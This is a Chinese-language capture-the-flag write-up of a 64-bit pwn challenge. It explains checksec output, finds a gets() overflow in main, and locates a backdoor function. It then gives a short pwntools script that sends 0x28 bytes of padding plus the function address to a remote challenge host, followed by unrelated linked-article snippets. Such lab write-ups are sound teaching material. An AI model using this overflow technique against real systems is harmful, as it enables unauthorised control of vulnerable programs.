启动环境,并下载附件。

远程连接之后,输入了一些命令,发现无反应。

开始分析附件。

先用checksec查看一下文件的安全属性。

文件是64位的且只开启了NX防御(这个保护开启就是意味着栈中数据没有执行权限,如此一来, 当攻击者在堆栈上部署自己的 shellcode 并利用缓冲区溢出等手段将恶意代码写入内存并使其触发时, 只会直接造成程序的崩溃,但是可以利用 rop (Return-Oriented Programming,返回导向编程)这种方法绕过。)

将文件放入IDA中详细查看。

在函数中发现了 lookatme 函数,他就是我们需要的后门函数,现在的思路就是要知道如何能让程序跳转到这个函数的地址上。

再分析 main 函数。发现了 gets() 危险函数。

双击v4,进入栈,判断栈溢出的字节为 0x20+8 .

并根据之前的后门函数 lookatme 的内存地址,开始编写 exp

exp:

from pwn import *

r=remote('node4.anna.nssctf.cn',28332)

lookatme=0x40072c

payload=b'a'*(0x20)+b'b'*8+p64(lookatme)#注意必须要是0x20,不能直接写20。

#payload=b'a'*(0x20+8)+p64(lookatme) 这个方式也可以

r.sendline(payload)

r.interactive()

成功得到了flag。

PWN手的成长之路-02-r3m4ke的更多相关文章

  1. redis成长之路——(一)

    为什么使用redis Redis适合所有数据in-momory的场景,虽然Redis也提供持久化功能,但实际更多的是一个disk-backed的功能,跟传统意义上的持久化有比较大的差别,那么可能大家就 ...

  2. 专访雷水果国:离1.5K至18K 一个程序猿5每年的成长之路

    我只是一个小菜鸟,对于自主学习和交流PHP(jquery,linux,lamp,shell,javascript,server)等一系列的知识.小菜鸟创建了一个群.希望光临本博客的人能够进来交流. 寻 ...

  3. 我的Cocos Creator成长之路1环境搭建以及基本的文档阅读

    本人原来一直是做cocos-js和cocos-lua的,应公司发展需要,现转型为creator.会在自己的博客上记录自己的成长之路. 1.文档阅读:(cocos的官方文档) http://docs.c ...

  4. 《菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师》

    <菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师> 国庆节快乐!一年一度长度排第二的假期终于来了. 难得有十一长假,作者也想要休息几天啦. 不管你是选择出门玩,还是在公司加班,在学 ...

  5. 原创电子书《菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师》

    <菜鸟程序员成长之路:从技术小白到阿里巴巴Java工程师> 国庆节快乐!一年一度长度排第二的假期终于来了. 难得有十一长假,作者也想要休息几天啦. 不管你是选择出门玩,还是在公司加班,在学 ...

  6. 架构师成长之路5.2-Saltstack远程执行

    点击架构师成长之路 架构师成长之路5.2-Saltstack远程执行 配置管理工具: Pupper:1. 采用ruby编程语言:2. 安装环境相对较复杂:3.不支持远程执行,需要FUNC工具配置才可以 ...

  7. 架构师成长之路5.7-Saltstack数据系统

    点击架构师成长之路 架构师成长之路5.7-Saltstack数据系统 1. Saltstack的两种数据系统 Grains Pollars 2. Saltstack数据系统---Grains Grai ...

  8. (转)Python成长之路【第九篇】:Python基础之面向对象

    一.三大编程范式 正本清源一:有人说,函数式编程就是用函数编程-->错误1 编程范式即编程的方法论,标识一种编程风格 大家学习了基本的Python语法后,大家就可以写Python代码了,然后每个 ...

  9. redis成长之路——(二)

    redis操作封装 针对这些常用结构,StackExchange.Redis已经做了一些封装,不过在实际应用场景中还必须添加一些功能,例如重试等 所以对一些常功能做了一些自行封装SERedisOper ...

  10. 【腾讯Bugly干货分享】JSPatch 成长之路

    本文来自于腾讯bugly开发者社区,非经作者同意,请勿转载,原文地址:http://dev.qq.com/topic/579efa7083355a9a57a1ac5b Dev Club 是一个交流移动 ...

随机推荐

  1. 前端开发系列051-基础篇之自定义事件和插槽(Vue)

    本文是早期学习Vue整理的一些阶段性总结,内容主要关于Vue框架中组件的事件传递和插槽. 一.组件通信(自定义事件) 组件间通信主要涉及到两方面的内容,即父组件(父级标签)向子组件传递数据以及子组件通 ...

  2. EVE-NG 修改QEMU的镜像

    首先先要建立一个lab,然后添加并启动一台QEMU的设备. 我用的是XRV9K.然后进行一些配置后,保存配置并关闭设备. 进入到这文件夹,这就是我的这台设备的文件夹. root@eve-ng:/opt ...

  3. RNN实现股价预测

    简介 import pandas as pd import numpy as np data = pd.read_csv('zgpa_train.csv') data.head() price = d ...

  4. linux 主题

    linux 默认主题见多了之后总会觉得审美疲劳,换一个新鲜的吧 装载自 linux公社 讲的已经比较好了 如果你使用的是图形界面,你会发现Ubuntu默认的界面真是丑的一批,所以下面以Ubuntu 1 ...

  5. 2025年Python安装运行mayavi过程全记录

    本文从新建干净环境python 3.7说起,需安装文件有 PyQt4-4.11.4, traits-6.3.1, VTK-8.1.2, mayavi-4.7.3, PyQt5, VisualStudi ...

  6. 进阶篇:3.1.1.5)DFM塑胶-注射模具和设备

    本章目的:了解塑胶件的注射模具典型结构. 1.前言 本章只是了解章节,介绍了塑胶件注射模具典型的机构.浇口.顶出,目的是为了设计出更好的塑胶零件. 但并非是需要结构设计工程师一定能设计出模具,人的精力 ...

  7. Win11专业版电脑开机速度慢的问题

    近期有一位电脑基地的用户反映自己的电脑开机速度总是比别人慢很多,老是需要等很久电脑才会进入系统,为此十分苦恼,那么对于这一情况有没有什么方法解决呢?下面我们一起来看看电脑基地小编是如何解决win11专 ...

  8. Ctrl+分号切换输入法

    今天在使用IDEA的AceJump插件的快捷键Ctrl+";"居然没效果,就看见输入法在跳,我确定了输入法里没有这个快捷键,但还是没用,索性禁用了大部分的Windows输入法快捷键 ...

  9. ES6语法解决现在笔记本屏幕设置为125% 150%导致页面缩放的问题

    校正windows页面在系统进行缩放后导致页面被放大的问题,通常放大比例是125%.150% /** * @author huangjf * @description 校正windows页面在系统进行 ...

  10. CH6 从文件中载入训练数据

    掌握用文本文件和CSⅴ文件准备训练数据 掌握对数据列和非数据列的处理 掌握从文件中加载训练数据 用文件准备训练数据 纯文本文件 纯文本文件(.txt):只保存文本信息的文件 相比Word.PDF等格式 ...